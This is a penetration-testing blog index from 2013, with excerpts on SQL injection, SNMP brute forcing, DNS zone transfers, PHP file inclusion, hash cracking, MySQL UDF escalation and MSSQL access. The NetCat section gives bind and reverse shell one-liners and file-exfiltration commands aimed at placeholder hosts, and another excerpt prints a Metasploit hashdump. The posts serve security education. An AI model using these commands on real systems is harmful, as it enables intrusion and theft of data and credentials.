mysql_real_escape_string won’t magically solve your SQL Injection problems

August 18th, 2013

Edited: 5th Oct 2014 after bug fixing and reader feedback
Edited: 6th Oct 2014 after reader feedback

I was engaged by an online retailer to test their custom web application CMS and store. I attended their premises and sat down with the tech manager and his lead developer to discuss with them from both a business management and a technical perspective some of the vulnerabilities that should be tested for, as well as to gain a solid understanding of the business needs and logic.

When I came on to SQL injection, I was assured by the lead developer that owing to their secure coding practices, SQL injection is completely impossible. All expected user entered integers are cast as integers, and all expected user entered strings are run through mysql_real_escape_string before being passed back to the database. Once code is committed by a developer to the development Subversion server, the lead developer then manually reviews it before deciding to push it live. Great, I thought, it’s certainly a good start. I did point out that this might not always work, but he didn’t seem too phased, and I didn’t want to get too much into a discussion about why or when that might not always work at that stage.
Read the rest of this entry »

Multithreaded TCP Proxy Tunnel Code

August 18th, 2013

Further to my earlier article, I went ahead and developed this application. Here’s a beta!

File: tcp_tun.c
Version: 0.3-beta
Title: TCP reassembling client-server application
Date: 17 Aug 13
Author: Adam Palmer <adam [AT] sasdataservicesĀ [DOT] com>
URL: http://www.adampalmer.me/iodigitalsec/
Read the rest of this entry »

SNMP Network Attacks

August 17th, 2013

Neither SNMPv1 and SNMPv2c have any security beyond a plaintext community string. The default community strings for read and write access are ‘public’ and ‘private’ respectively. Some Cisco devices use ‘ilmi’ as the default community string.

We can use the tool ‘onesixytyone’ to attempt to brute force the name of the community string from a dictionary:

root@pwn:/pentest/enumeration/snmp/onesixtyone# ./onesixtyone -c dict.txt 10.0.10.51
Scanning 1 hosts, 51 communities
Cant open hosts file, scanning single host: 10.0.10.51
10.0.10.51 [public] Linux dev1 2.6.32-5-686 #1 SMP Sun Sep 23 09:49:36 UTC 2012 i686

The community string was successfully brute forced, and is set to the default, ‘public’.

We can now use ‘snmpenum.pl’ to enumerate the host based on this information (some parts truncated to save space)
Read the rest of this entry »

DNS Zone Transfer (AXFR) Vulnerability

August 16th, 2013

A vulnerability exists when DNS servers are [mis]configured to allow for public zone transfers. A zone transfer is literally that – the transfer of an entire zone file, intended primarily for replication and availability between multiple DNS servers. A DNS zone transfer is attempted as follows:

dig axfr <domain> @<DNS server>

Read the rest of this entry »

PHP Local and Remote File Inclusion (LFI, RFI) Attacks

August 15th, 2013

PHP supports the ability to ‘include’ or ‘require’ additional files within a script. If unsanitized data is passed to such functions, an attacker may be able to get remote code execution access to the server. A typical include block might look something like this:

<?php
require("config/settings.inc.php");
require("lib/db.lib.php");
require("lib/parser.lib.php");
include("contrib/users/user.contrib.php");
die("This is a test");
?>

Now, it’s also possible to dynamically require or include files based on variables or user input, say for example:
Read the rest of this entry »

Cracking Windows Password Hashes with Metasploit and John

August 15th, 2013

The output of metasploit’s ‘hashdump’ can be fed directly to John to crack with format ‘nt’ or ‘nt2’. Let assume a running meterpreter session, by gaining system privileges then issuing ‘hashdump’ we can obtain a copy of all password hashes on the system:

meterpreter &gt; getsystem
...got system (via technique 1).
meterpreter &gt; hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee1033bf942cfdccbb38ab9f97319d19:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
daves:1105:aad3b435b51404eeaad3b435b51404ee:5053e7c659a614ce46d99dcfb8d9763a:::
paulp:1106:aad3b435b51404eeaad3b435b51404ee:8fdecf063cdac5d8407c5b1a75826fad:::
davem:1107:aad3b435b51404eeaad3b435b51404ee:ef00760ac292f0e8da9ca1850ee5be2f:::
office1:1108:aad3b435b51404eeaad3b435b51404ee:5052340fe27eb55317e38a7876480b18:::
office2:1109:aad3b435b51404eeaad3b435b51404ee:ad0c54ced11a55168eef0429775b1f7e:::
admin:1110:aad3b435b51404eeaad3b435b51404ee:d22d7dfc2fb717d7663b47131b1e2347:::
muser1:1111:aad3b435b51404eeaad3b435b51404ee:5053e7c659a614ce46d99dcfb8d9763a:::
muser2:1112:aad3b435b51404eeaad3b435b51404ee:b180be38c6c29a74431c966e57e4a7d8:::
muser3:1113:aad3b435b51404eeaad3b435b51404ee:e50be861156e77e57e7247b3edc1d9b6:::
muser4:1114:aad3b435b51404eeaad3b435b51404ee:a2d639861ee3a2566259796b85a08bc9:::
muser5:1116:aad3b435b51404eeaad3b435b51404ee:8fb609d78209fd8e0b91bff896a73eca:::
mike:1117:aad3b435b51404eeaad3b435b51404ee:cf9d1a4a87ab69e06d014e9c06910946:::

Now we run John –

john ./pwlist.txt --format=nt --wordlist=/pentest/passwords/wordlists/rockyou.txt
Loaded 13 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
                 (Guest)
Warning: passwords printed above might not be all those cracked
Use the &quot;--show&quot; option to display all of the cracked passwords reliably

Unfortunately, we could only ‘crack’ the Guest account with it’s blank password – that won’t be much use. Better luck next time or try using a bigger wordlist!

NetCat Pen Testing

August 13th, 2013

NetCat – the versatile swiss army knife of network utilities is one of the most helpful tools to have during a pen test. Here are 4 useful snippets:

a. The bind shell on port 8080

Remote Host: nc -lvp 8080 -e /bin/bash
Local Host: nc re.mo.te.ip 8080

b. The reverse shell on port 8080

Local Host: nc -lvp 8080
Remote Host: nc yo.ur.ho.st 8080 -e /bin/bash

c. File Transfer

Host A: nc -lvp 8080 > local.file
Host B: cat remote.file | nc yo.ur.ho.st 8080
or
Host B: nc yo.ur.ho.st 8080 < remote.file

d. Directory Transfer with GZip compression

Host A: tar zc directory | nc -w1 yo.ur.ho.st 8080
Host B: nc -lvp 8080|tar zx

MySQL Root to System Root with lib_mysqludf_sys for Windows and Linux

August 13th, 2013

Once a MySQL database server has been compromised at root level, it’s often possible to escalate this access to full system level access using User Defined Functions (UDFs). We may have MySQL root access but not system root access for a number of reasons including having a shell account on the target whilst MySQL’s root user has been left unpassworded by default, or alternatively gaining access via SQL injection through a web application connecting to the database as root, which is something I see far too often.

Firstly, you’ll want to check out a copy of sqlmap. For this attack you’ll want to browse to the ‘udf’ directory and select the appropriate library depending on your target platform:

  1. udf/mysql/linux/32/lib_mysqludf_sys.so
  2. udf/mysql/linux/64/lib_mysqludf_sys.so
  3. udf/mysql/windows/32/lib_mysqludf_sys.dll
  4. udf/mysql/windows/64/lib_mysqludf_sys.dll

The steps for escalation on both Windows and Linux are the same. Firstly, we need to get a copy of the correct library on to the target machine in a known location – this could be by uploading to a user account we have access to, or uploading via a website image/file upload, or anonymous FTP account. The second step is issuing a SQL query to load this file in to a newly created table row.

Third, we then want to dump that table row out to a new file in either the ‘/usr/lib’ directory or the ‘c:\windows\system32’ directory depending on whether we are on Linux or Windows respectively. The reason we need to do this, is that our regular web application or user account does not have permission to create files in these directories, however the MySQL root user does. Next, we want to instruct MySQL to create a new function to point to the code in our malicious library. Lastly, we execute this new function with arbitrary system commands that we wish to run.
Read the rest of this entry »

First Steps in Oracle Penetration Testing

August 12th, 2013

In this article, I’ll discuss a range of basic Oracle 9 testing principles from the SID and account enumeration to query execution and finally, you guessed it, remote code execution.

If you’re looking for professional oracle penetration testing, please contact me.

Firstly, we’ll check to see that TCP port 1521 which is the Oracle Net Listener is open using nmap:

nmap -p 1521 192.168.15.205
Oracle Net Listener Nmap

Oracle Net Listener Nmap

Once done, we can use the ‘status’ and ‘version’ commands to get more information, using ‘tnscmd.pl’ from a tool called ‘oracle_checkpwd’:

./tnscmd.pl version -h 192.168.15.205
./tnscmd.pl status -h 192.168.15.205
tnscmd Version and Status

tnscmd Version and Status

Read the rest of this entry »

Sending Email and Attachments from the Linux Command Line

August 11th, 2013

If you’ve ever wanted to send an email with an attachment from the Linux command line, ‘sendemail’ is the tool you want

apt-get install sendemail

Once installed, the most common usage is:

sendemail -t $to_address -f $from_address -s $smtp_server -u $subject -m $message -a $attachment

That’s it. Email sent!

Windows Null Session Enumeration

August 10th, 2013

Null Sessions are a ‘feature’ of Windows allowing an anonymous user to connect to the IPC$ share and enumerate certain information. We can connect to this under Windows using the commands:

net use \\IP_ADDRESS\ipc$ "" /user:"" 
net use

or from Linux with:

rpcclient -U "" IP_ADDRESS

Once connected and at the “rpcclient $>” prompt, we can issue a ‘?’ to look at the supported commands. The most interesting are ‘enumdomusers’, ‘netshareenum’, ‘netshareenumall’ and ‘querydominfo’. Here’s the output against a sample lab machine:

rpcclient $> enumdomusers
cli_pipe_validate_current_pdu: RPC fault code DCERPC_FAULT_OP_RNG_ERROR received from host 192.168.1.20!
user:[admin] rid:[0x3ef]
user:[Administrator] rid:[0x1f4]
user:[npn] rid:[0x3f0]
user:[Guest] rid:[0x1f5]

rpcclient $> querydominfo
cli_pipe_validate_current_pdu: RPC fault code DCERPC_FAULT_OP_RNG_ERROR received from host 192.168.1.20!
Domain:		WINSRV
Server:		
Comment:	
Total Users:	13
Total Groups:	1
Total Aliases:	0
Sequence No:	899
Force Logoff:	-1
Domain Server State:	0x1
Server Role:	ROLE_DOMAIN_PDC
Unknown 3:	0x1
rpcclient $> 

Read the rest of this entry »

Accessing and Hacking MSSQL from Backtrack Linux

August 10th, 2013

In this article, we’ll cover connecting to a Microsoft SQL (MSSQL) server from the Backtrack/Linux command line, executing system commands through the ‘sa’ or other administrative account, and finally exploiting the ‘sa’ account through metasploit.

To start with, let’s cover a quick HOWTO on getting an MSSQL client working under Backtrack/Linux. We’ll need freetds and sqsh for this:

apt-get install sqsh freetds-bin freetds-common freetds-dev

Once done, we’ll need to edit /etc/freetds/freetds.conf, and append the following to it:

[MyServer]
host = 192.168.1.10
port = 1433
tds version = 8.0

And lastly, we’ll edit ~/.sqshrc:

\set username=sa
\set password=password
\set style=vert

Read the rest of this entry »